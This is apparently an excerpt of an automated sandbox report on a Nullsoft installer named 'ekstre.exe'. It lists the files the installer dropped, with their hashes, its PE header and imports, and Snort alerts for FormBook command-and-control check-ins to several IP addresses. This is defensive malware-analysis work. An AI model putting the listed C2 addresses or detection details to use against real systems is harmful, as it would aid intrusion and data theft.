SHA-512:	2C589563E4D01E1D2CC00032EB707C917D15207A206EFB1E113CB5F618B69EB8E4A012E3FED61D2E65F29E557DE15949587E022F737630E3F233B7B42A3B4D19
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<svg height="16px" viewBox="0 0 16 16" width="16px" xmlns="http://www.w3.org/2000/svg">. <g fill="#2e3436">. <path d="m 9 13 v -10 h -2 v 10 z m 0 0"/>. <path d="m 4 10 v 1 c 0 0.265625 0.09375 0.53125 0.28125 0.71875 l 3.71875 3.71875 s 2.480469 -2.480469 3.71875 -3.71875 c 0.1875 -0.1875 0.28125 -0.453125 0.28125 -0.71875 v -1 h -1 c -0.265625 0 -0.53125 0.09375 -0.71875 0.28125 l -2.28125 2.28125 l -2.28125 -2.28125 c -0.1875 -0.1875 -0.453125 -0.28125 -0.71875 -0.28125 z m 0 0"/>. <path d="m 4 6 v -1 c 0 -0.265625 0.09375 -0.53125 0.28125 -0.71875 l 3.71875 -3.71875 s 2.480469 2.480469 3.71875 3.71875 c 0.1875 0.1875 0.28125 0.453125 0.28125 0.71875 v 1 h -1 c -0.265625 0 -0.53125 -0.09375 -0.71875 -0.28125 l -2.28125 -2.28125 l -2.28125 2.28125 c -0.1875 0.1875 -0.453125 0.28125 -0.71875 0.28125 z m 0 0"/>. </g>.</svg>.

C:\Users\user\procharity\Anasarca\Uncompelled\Ediktet\Tavlemestrene\Ungeneral\orientation-portrait-right-symbolic.svg

Download File

Process:	C:\Users\user\Desktop\ekstre.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	282
Entropy (8bit):	4.69381573476161
Encrypted:	false
SSDEEP:	6:tI9mc4slzc87E4Gu/TtRhror/cWfZknUi/sq/aYOWSaq5eKVyKG+Kb0/:t4C87E4Gqjhr2f2U9RVJaopj9A0/
MD5:	B7AB3B03153FB5BAC16C1EB9119D30AC
SHA1:	959CC02CDD6CEFD36FF6EA10D7F8766A55BEE838
SHA-256:	725D790B0DB6A4FAB758B3DE6BD33C0DF5E03ED53F0FE8C12109C0FDC8EBDB93
SHA-512:	CB1E2D6A6CCE78625BA8ACE9A9E06196E2A7719B1885D97991C2D7ABA5FBE4D8BCF8CE09F298A496394DC0011F0D02FE406796B69E9D106744031E480D1F0221
Malicious:	false
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="16" height="15.959"><path d="M13.032 2.166a1.11 1.11 0 00-1.113-1.113H4.073A1.11 1.11 0 002.96 2.166v11.738a1.11 1.11 0 001.113 1.113h7.846a1.11 1.11 0 001.113-1.113zm-3 5.842l-4.063 3.99v-8z" style="marker:none" fill="#474747"/></svg>

C:\Users\user\procharity\Anasarca\Uncompelled\Ediktet\Tavlemestrene\Ungeneral\schema-639-5.json

Download File

Process:	C:\Users\user\Desktop\ekstre.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	768
Entropy (8bit):	4.258220287910593
Encrypted:	false
SSDEEP:	12:8gn24UmS5alzMF+Q+1qu9slRnCBslRjWnfmYbCNs6:zzS5a6+1qu+7CC7KfmYbCW6
MD5:	DF2EDC28F4E782013F9FE4CE33C2D1E2
SHA1:	414C12FAC69FF2942B3075996A8DB9D7BE9A30F6
SHA-256:	F829C652F0BDB6A5E9C8F4FD8A5E6AC5F1895F65969CDFC267276641673DE65A
SHA-512:	FCE05D6C10B28DC4E428171CE0E7D7BF929E81253641514B1A4AC61AACCF0CE51F406183A38DC33A8BBFF0B4762AB3B0375ECA36FB8DE998C50CBBBBF7076912
Malicious:	false
Preview:	{. "$schema": "http://json-schema.org/draft-04/schema#",.. "title": "ISO 639-5",. "description": "ISO 639-5 language family and groups codes",. "type": "object",.. "properties": {.."639-5": {. "type": "array",. "items": {. "type": "object",. "properties": {. "alpha_3": {. "description": "Three letter code of the language family or group",. "type": "string",. "pattern": "^[a-z]{3}$". },. "name": {. "description": "Name of the language family or group",. "type": "string",. "minLength": 1. }. },. "required": ["alpha_3", "name"],. "additionalProperties": false. }. }. },. "additionalProperties": false.}.

C:\Users\user\procharity\Anasarca\Uncompelled\Ediktet\Tavlemestrene\Ungeneral\video-display-symbolic.svg

Download File

Process:	C:\Users\user\Desktop\ekstre.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	302
Entropy (8bit):	4.652009481705799
Encrypted:	false
SSDEEP:	6:tI9mc4slzcWER40iFb5YDCXEUV8iHYoF1vmP92PhOmlRn+1T7G+Kb0/:t4CDq0mbvnP4/PkJJRn+1T79A0/
MD5:	B52C16AE04F7DD29EE6209AB5904FC6C
SHA1:	DDDF7783BC653D119DC216F1D8EC2698B22E9059
SHA-256:	AEDC2A5578489B00C571C9E4A54E11E79AAB26D68C2BB0717105E1280E251A41
SHA-512:	35D5FBEFA0112490DD31F2765774F235C3794AFDD04A8DEC37B9480DE727ED996CE42BBD9E8C3B5669859D1C92405946DEDBFCA54BA7FDBE3CEEF7A91A87E4B7
Malicious:	false
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><path d="M3 1C1.338 1 0 2.338 0 4v7c0 1.662 1.338 3 3 3h10c1.662 0 3-1.338 3-3V4c0-1.662-1.338-3-3-3zm0 2h10c.554 0 1 .446 1 1v7c0 .554-.446 1-1 1H3c-.554 0-1-.446-1-1V4c0-.554.446-1 1-1zm5 13c3 0 4-1 4-1H4s1 1 4 1z" fill="#474747"/></svg>

C:\Users\user\procharity\Anasarca\Uncompelled\Gaardsbredde\cartiest\PangoOT-1.0.typelib

Download File

Process:	C:\Users\user\Desktop\ekstre.exe
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1245
Entropy (8bit):	5.462849750105637
Encrypted:	false
SSDEEP:	24:hM0mIAvy4Wvsqs1Ra7JZRGNeHX+AYcvP2wk1RjdEF3qpMk5:lmIAq1UqsziJZ+eHX+AdP2TvpMk5
MD5:	5343C1A8B203C162A3BF3870D9F50FD4
SHA1:	04B5B886C20D88B57EEA6D8FF882624A4AC1E51D
SHA-256:	DC1D54DAB6EC8C00F70137927504E4F222C8395F10760B6BEECFCFA94E08249F
SHA-512:	E0F50ACB6061744E825A4051765CEBF23E8C489B55B190739409D8A79BB08DAC8F919247A4E5F65A015EA9C57D326BBEF7EA045163915129E01F316C4958D949
Malicious:	false
Preview:	<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="http://www.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>..<title>404 - File or directory not found.</title>..<style type="text/css">.. ..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}..-->..</style>..</head>..<body>..<div id="header"><h1>Server Error</h1></div>..<div id="content">.. <div class="co

C:\Users\user\procharity\Anasarca\Uncompelled\Gaardsbredde\cartiest\document-open-recent-symbolic.svg

Download File

Process:	C:\Users\user\Desktop\ekstre.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	856
Entropy (8bit):	5.104082637403519
Encrypted:	false
SSDEEP:	12:t4CP5GdKdj9xclSaRaUlYzXHnbt1tUg1yU2hz4AeWTjiu+1ITpLhz4AeWK:t4CBGMFklSelln4AeWoI9x4AeWK
MD5:	93721360A2E739317994A0478117B840
SHA1:	459A0D7C35526AD3E03BE62E41C2AC1BF2518F6A
SHA-256:	15322D905A2DA0DFC566C0A17E9CFB303F5EDCCDB97CF30970AAEF6249E3A67A
SHA-512:	9AEFEB4749652BD968AF4F5FB9009715E913848F8662DF54955B9D0A25AEC10F0FC6701D4E470E4C5DC2CAC3A28073DDA13E1BC57F32319D5ECF83DC588EEC62
Malicious:	false
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><g color="#000" font-weight="400" font-family="Sans" fill="#474747"><path d="M8.487.02A7.492 7.492 0 001 7.507a7.492 7.492 0 007.487 7.486 7.492 7.492 0 007.486-7.486A7.492 7.492 0 008.487.02zm0 1.973A5.508 5.508 0 0114 7.507a5.508 5.508 0 01-5.513 5.513 5.508 5.508 0 01-5.514-5.513 5.508 5.508 0 015.514-5.514z" style="line-height:normal;-inkscape-font-specification:Sans;text-indent:0;text-align:start;text-decoration-line:none;text-transform:none;marker:none" overflow="visible"/><path d="M11.393 4.007a.5.5 0 00-.25.156L8.487 6.819 6.83 5.163a.5.5 0 10-.687.687l2 2a.5.5 0 00.687 0l3-3a.5.5 0 00-.437-.843z" style="line-height:normal;-inkscape-font-specification:Sans;text-indent:0;text-align:start;text-decoration-line:none;text-transform:none;marker:none" overflow="visible"/></g></svg>

C:\Users\user\procharity\Anasarca\Uncompelled\Gaardsbredde\cartiest\document-revert-symbolic-rtl.svg

Download File

Process:	C:\Users\user\Desktop\ekstre.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	1724
Entropy (8bit):	5.094381704348926
Encrypted:	false
SSDEEP:	24:t4CBGEAl+NHqIQhQyKbRAecFhBrNdaMPiKEyKbRAecFhBrNx0/BSOsJMgVMhK:giBQONtAecFZdvSNtAecFZwQNVz
MD5:	2A7EB5CC3003641B58D03005C96471BD
SHA1:	C535719015040A3F7E82D472BF257BC2D68B39B9
SHA-256:	36D6147B3C3724195745184B1D74C377F2466E82351DE3AF724A996DB4B41564
SHA-512:	9A0B03A3B13A75182EC9181FE1F0BCFDE10C95634B9657899C80D86D9D9C3CD01EB5C8512274FBDCF45EA7DA7437609F838DAEE1BDE6F72E64399321DF659077
Malicious:	false
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><g color="#000" fill="#2e3436"><path d="M3 1a1 1 0 00-1 1v5h2V3h5.586L12 5.414V14H5v2h8a1 1 0 001-1V5a1 1 0 00-.293-.707l-3-3A1 1 0 0010 1zm2 7c-1.333 0-2.275.814-2.645 1.553C1.986 10.29 2 11 2 11v5h2v-5s.014-.291.145-.553c.13-.261.188-.447.855-.447h4V8H8z" style="line-height:normal;font-variant-ligatures:normal;font-variant-position:normal;font-variant-caps:normal;font-variant-numeric:normal;font-variant-alternates:normal;font-feature-settings:normal;text-indent:0;text-align:start;text-decoration-line:none;text-decoration-style:solid;text-decoration-color:#000;text-transform:none;text-orientation:mixed;white-space:normal;shape-padding:0;isolation:auto;mix-blend-mode:normal;solid-color:#000;solid-opacity:1" font-weight="400" font-family="sans-serif" overflow="visible" fill-rule="evenodd"/><path d="M7.707 6.293L6.293 7.707 7.586 9l-1.293 1.293 1.414 1.414L10.414 9z" style="line-height:normal;font-variant-ligatures:normal;fon

C:\Users\user\procharity\Anasarca\Uncompelled\Indoktrineringens\Green_Leaves_11.bmp

Download File

Process:	C:\Users\user\Desktop\ekstre.exe
File Type:	PNG image data, 110 x 110, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4912
Entropy (8bit):	7.940731187600188
Encrypted:	false
SSDEEP:	96:zTwrjw62P+q7p+VjgvwPSyiftpOne6ODppDFGWkTE:yw62Gq7CjuYSRtpz7DzDFGq
MD5:	1F54C868948D8B0E7D951FBC65F79F3A
SHA1:	C7D58E2F81931BF6708FD77E691A12D99E261765
SHA-256:	542B3FF955758661724B67B9FCACC77543170491B8170B60A770BBCB4D1889D0
SHA-512:	9C25670B5F1D19BC50D31BAB096361AA8163C68E53E12DCD0150E990598F171A74BE4E9D37831BF013FB8B24BBCF356DE11C097D32A1C228EF0C76D5B3C29692
Malicious:	false
Preview:	.PNG........IHDR...n...n.....I9......pHYs...a...a..?.i....IDATx...wT.y...'.).J.PB.....(.u@,.X(...D.....PP..)...B.-....t....xg.8u.NQ.73..=.......y..K./...'..}../...R.~..9A)...RhA)...RhA)...RhA)...RhA)...Rh.4..3..`...5{6jd.2.fkh.a.y.m........[.................<zB......nZl...\.Rp.-n....m...-.^..QB.....R.x..%.=...,(..9{.....@?..p%):...N.(.v..#........v.3..1jj?5.E.t=u_...mO.=....R...K......>......7..WW._].iu...._o.}.../...-.....pH.u. ...,...x.J;...sp.f...`....e..L.]. k....w..J.M...B. #sH.5f..9.c...Lir......A.{..._..1kg.....xf._....e..#_.Rr},...7Pmo..1H..N.RL...9..y.1M..z.+K.@6..S.\.\|..i.b\'.t.....q..z..BY.S.U'..... h.!".jG...<....(.{..\|._.5.W<5....g;..Y.F5/w...e.Y.{.D.....P..T...2{..W./.N.........?\|..._........N.,z..d..6....o....J9......\.".a.~.U...s.....Y.T+q.A:.Q.G.9....(.Y..9..?...\.^d]...9<.fz.$v../.c.p....-.=.z.[...k...-.....G..e<O....=r.=.5S.I..1..FJJ...:.@.Bd.b\|.f\|.FZ..K!$w...a.;.x......N...*.. ..b.....F.....\|L.=Z.c......mOu..j..

C:\Users\user\procharity\Anasarca\Uncompelled\tilfjes\Expediencies\EBCDIC.map

Download File

Process:	C:\Users\user\Desktop\ekstre.exe
File Type:	data
Category:	dropped
Size (bytes):	768
Entropy (8bit):	3.186763197106263
Encrypted:	false
SSDEEP:	3:l/lllxmRGMFMLm/t5OAKmEe/lVtRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRf:xllHmRvspnWLIIRbRwmZYGDMZ2jwZ4
MD5:	FC2195CEA58424FA0F941E6BEEF00842
SHA1:	3167168558855B658D5349FE68DBD974146E23FA
SHA-256:	61CB160BEF793C65996AEDC7742B61BABF0F0EC8342CEA293992352897E96D74
SHA-512:	28C459EF4F164EBC060E1EF782D202CC9ABC490E12AA0946EE1925B705FEE66DBD2308737BFAC308706FDD7AE18166DF6355D506C369C276FDC2EE10138E21A7
Malicious:	false
Preview:	HWCM........EBCDIC..........................EBCDIC Character Set Mapping....................................................................................................BreakPoint Software, Inc.....................................................................................................................................................................................................................<.(.+.\|.&...................!.$.*.).;...-...................\|.'.%._.>.?...................\.:.#.@.'..."...a.b.c.d.e.f.g.h.i...............j.k.l.m.n.o.p.q.r...............~.s.t.u.v.w.x.y.z.............................................{.A.B.C.D.E.F.G.H.I.............}.J.K.L.M.N.O.P.Q.R.............\...S.T.U.V.W.X.Y.Z.............0.1.2.3.4.5.6.7.8.9.\|..........

C:\Users\user\procharity\Anasarca\Uncompelled\tilfjes\Expediencies\Filmmuligheder.Dis

Download File

Process:	C:\Users\user\Desktop\ekstre.exe
File Type:	data
Category:	dropped
Size (bytes):	117923
Entropy (8bit):	4.608564699332552
Encrypted:	false
SSDEEP:	3072:CxRSoewlfFgtqpnbIChqp5Rgw1ItdZh0MxjWv:a5FSq9Rhqpotd70MxjE
MD5:	744BA4009BF696B415F7A6B48E0874D3
SHA1:	DE2046A72D3F7B1D289280571B829F59AE213C49
SHA-256:	C089BDF4C2D863BF32030A1351862DBCA359F5029B744268840879355EF5649D
SHA-512:	E670B761F7149C432F0F5F4CC1E1593982CD7F87ED4EA1B71940694BAC7F31087140E17EE5516C6E3D046C7C55A365E2F979F0C424E023D577E83E4B48D236D0
Malicious:	false
Preview:	..............O.GG...aaaa...7...}}}}}.......`................Z.................................v......{{{.......BBBBBB...........................A........../...UUUUU............9..........ll.x...................FFF.....yyyyy.......,..n...~~.....PPP.)....~.......A......................................YY..v................KKKK......NNN....&.............V.......................BBBB...\.....KKKK....g......... ....................ii...............v...........^^^^......\|................."..................\..........}...........\|...........0.KK..............".............22....EE....88....r...................F....................}.....................................................................d....ll.....QQQ.........}}.......e.........%%.aa.............MM...........sss......................eee......4.................}...............................,,.........------....M.`...............::.......s..BBBBBB.wwww...........................tt...////............G...f..FFF..'............O.{.

C:\Users\user\procharity\Anasarca\Uncompelled\tilfjes\Expediencies\revalourise.Pal134

Download File

Process:	C:\Users\user\Desktop\ekstre.exe
File Type:	data
Category:	dropped
Size (bytes):	282989
Entropy (8bit):	7.020123826889068
Encrypted:	false
SSDEEP:	3072:cdI9iQp4hjIWZRoGhrwnqeppcL7NM/xWa8edjfAW1oGjmVhlbUb2jEBYY6nNWl81:cd0i34GSnsM/QaLh1vmVhKbO8HEW1Rw
MD5:	4538CBB0CC78E66A31BD3E11823CABBD
SHA1:	D3AB83F2101AE161B48C438E1B61E5EB25041D2A
SHA-256:	10F2D0D7D0AA974F1B38CDD7B5A5A88CA1FF90EC02CA3D68C6814BB2384DC707
SHA-512:	80B696B80DDB2BE174B7FD0D45D9DC963C97EDEAA74C58E40335387F3BB6407AACD6A68666C2956E82FB7E371DD11ED41EE8A1F2924D9C7528BE3C59EAD380C3
Malicious:	false
Preview:	.............``.!.b....b......5.....OO...CC........5..m....s.....::.....y.tttt........jj...uuu...................I.A.........L........../.........t.c..yy.................................ee...W.DDD..............[....n.k....6...\|.............SSS.............R.........yyy....X......M........................!......L.......................9..................................s..........oo...:::.....{{{.g..................................................~~.............h.}............~................@.........DD.............................e..6.z..........\|....kkkkkkkk...WW...a.........................................__...s............:::...............666.6...{{..........K...........//....\|........III....?.................{............JJ...>>>>>.....)...XX..............%.BBBBBBB...............dd.............BBB............J..d...................R.......M.j......~~................\.................../................k.I.......L..................................#...............jjj.......2......

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.935575447709249
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	ekstre.exe
File size:	321598
MD5:	6f2c2220fcdbb75d33aea719a1b55b24
SHA1:	9246276df38b3c2dff316dd432928bb709caf88c
SHA256:	86d7bb37384646a755a03c2f6e743483ee40d5af6f018824e89c54a9308ceecf
SHA512:	693e6ba74b7bccf558c650a794f38e70f238b70a8883bf8abb8024d2d6c5a10e00a1ec6b881560870e250476dd2257ff40f8c3a06767970bfef83cceacae06fa
SSDEEP:	6144:H6+/tVwcQS/Y57aNJzbGA8n6qmHRdBdGHyfM2gNaVJb05cOYJ0wNRHOxI7TlSPLZ:PnwcQS/K70JzSA8neGSfLgNUJkYWkKIS
TLSH:	5B641203B732A8A7F56613B2097B1F55CBFA8D6421B82B471738755AB972243E31F342
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!.@.@...@...@../O...@...@..L@../O...@...c...@..+F...@..Rich.@..........PE..L.....Oa.................d....;.. ...3............@

File Icon


Icon Hash:	b2a88c96b2ca6a72

Static PE Info

General

Entrypoint:	0x403390
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x614F9CAA [Sat Sep 25 22:03:22 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	5f0c714c36e6cc016b3a1f4bc86559e4

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 00000220h
push esi
push edi
xor edi, edi
push 00008001h
mov dword ptr [ebp-10h], edi
mov dword ptr [ebp-04h], 0040A198h
mov dword ptr [ebp-08h], edi
mov byte ptr [ebp-0Ch], 00000020h
call dword ptr [004080B8h]
mov esi, dword ptr [004080BCh]
lea eax, dword ptr [ebp-000000C0h]
push eax
mov dword ptr [ebp-000000ACh], edi
mov dword ptr [ebp-2Ch], edi
mov dword ptr [ebp-28h], edi
mov dword ptr [ebp-000000C0h], 0000009Ch
call esi
test eax, eax
jne 00007F83F8F60AA1h
lea eax, dword ptr [ebp-000000C0h]
mov dword ptr [ebp-000000C0h], 00000094h
push eax
call esi
cmp dword ptr [ebp-000000B0h], 02h
jne 00007F83F8F60A8Ch
movsx cx, byte ptr [ebp-0000009Fh]
mov al, byte ptr [ebp-000000ACh]
sub ecx, 30h
sub al, 53h
mov byte ptr [ebp-26h], 00000004h
neg al
sbb eax, eax
not eax
and eax, ecx
mov word ptr [ebp-2Ch], ax
cmp dword ptr [ebp-000000B0h], 02h
jnc 00007F83F8F60A84h
and byte ptr [ebp-26h], 00000000h
cmp byte ptr [ebp-000000ABh], 00000041h
jl 00007F83F8F60A73h
movsx ax, byte ptr [ebp-000000ABh]
sub eax, 40h
mov word ptr [ebp-2Ch], ax
jmp 00007F83F8F60A66h
mov word ptr [ebp-2Ch], di
cmp dword ptr [ebp-000000BCh], 0Ah
jnc 00007F83F8F60A6Ah
and word ptr [ebp+00000000h], 0000h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8438	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4bd000	0xb48	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x29c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6393	0x6400	False	0.6801171875	data	6.492606591005325	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1276	0x1400	False	0.43359375	data	5.057696881091476	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x3bc078	0x600	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x3c7000	0xf6000	0x0	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x4bd000	0xb48	0xc00	False	0.423828125	data	4.377061098345556	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x4bd1c0	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	English	United States
RT_DIALOG	0x4bd4a8	0x100	data	English	United States
RT_DIALOG	0x4bd5a8	0x11c	data	English	United States
RT_DIALOG	0x4bd6c8	0xc4	data	English	United States
RT_DIALOG	0x4bd790	0x60	data	English	United States
RT_GROUP_ICON	0x4bd7f0	0x14	data	English	United States
RT_MANIFEST	0x4bd808	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States

Imports

DLL	Import
ADVAPI32.dll	RegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
SHELL32.dll	SHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
ole32.dll	IIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
COMCTL32.dll	ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll	SetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, SetWindowPos, SetCursor, GetSysColor, SetClassLongA, GetWindowLongA, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
GDI32.dll	SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll	GetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, ReadFile, GetTempFileNameA, WriteFile, RemoveDirectoryA, CreateProcessA, CreateFileA, GetLastError, CreateThread, CreateDirectoryA, GlobalUnlock, GetDiskFreeSpaceA, GlobalLock, SetErrorMode, GetVersionExA, lstrcpynA, GetCommandLineA, GetTempPathA, lstrlenA, SetEnvironmentVariableA, ExitProcess, GetWindowsDirectoryA, GetCurrentProcess, GetModuleFileNameA, CopyFileA, GetTickCount, Sleep, GetFileSize, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.11.20185.53.179.9049806802031412 03/30/23-10:39:18.251061	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49806	80	192.168.11.20	185.53.179.90
192.168.11.20185.53.179.9049806802031453 03/30/23-10:39:18.251061	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49806	80	192.168.11.20	185.53.179.90
192.168.11.2023.227.38.7449811802031449 03/30/23-10:41:01.465366	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49811	80	192.168.11.20	23.227.38.74
192.168.11.2076.223.105.23049821802031453 03/30/23-10:42:03.452019	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49821	80	192.168.11.20	76.223.105.230
192.168.11.2023.227.38.7449828802031449 03/30/23-10:43:24.739881	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49828	80	192.168.11.20	23.227.38.74
192.168.11.2034.138.169.849790802018752 03/30/23-10:36:18.142751	TCP	2018752	ET TROJAN Generic .bin download from Dotted Quad	49790	80	192.168.11.20	34.138.169.8
192.168.11.2023.227.38.7449811802031412 03/30/23-10:41:01.465366	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49811	80	192.168.11.20	23.227.38.74
192.168.11.2076.223.105.23049821802031449 03/30/23-10:42:03.452019	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49821	80	192.168.11.20	76.223.105.230
192.168.11.2023.227.38.7449828802031412 03/30/23-10:43:24.739881	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49828	80	192.168.11.20	23.227.38.74
192.168.11.2023.227.38.7449811802031453 03/30/23-10:41:01.465366	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49811	80	192.168.11.20	23.227.38.74
192.168.11.2023.227.38.7449828802031453 03/30/23-10:43:24.739881	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49828	80	192.168.11.20	23.227.38.74
192.168.11.20185.53.179.9049806802031449 03/30/23-10:39:18.251061	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49806	80	192.168.11.20	185.53.179.90
192.168.11.2076.223.105.23049821802031412 03/30/23-10:42:03.452019	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49821	80	192.168.11.20	76.223.105.230

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 30, 2023 10:35:47.475135088 CEST	80	49675	192.229.221.95	192.168.11.20
Mar 30, 2023 10:35:47.475368977 CEST	49675	80	192.168.11.20	192.229.221.95
Mar 30, 2023 10:35:53.774666071 CEST	80	49701	192.229.221.95	192.168.11.20
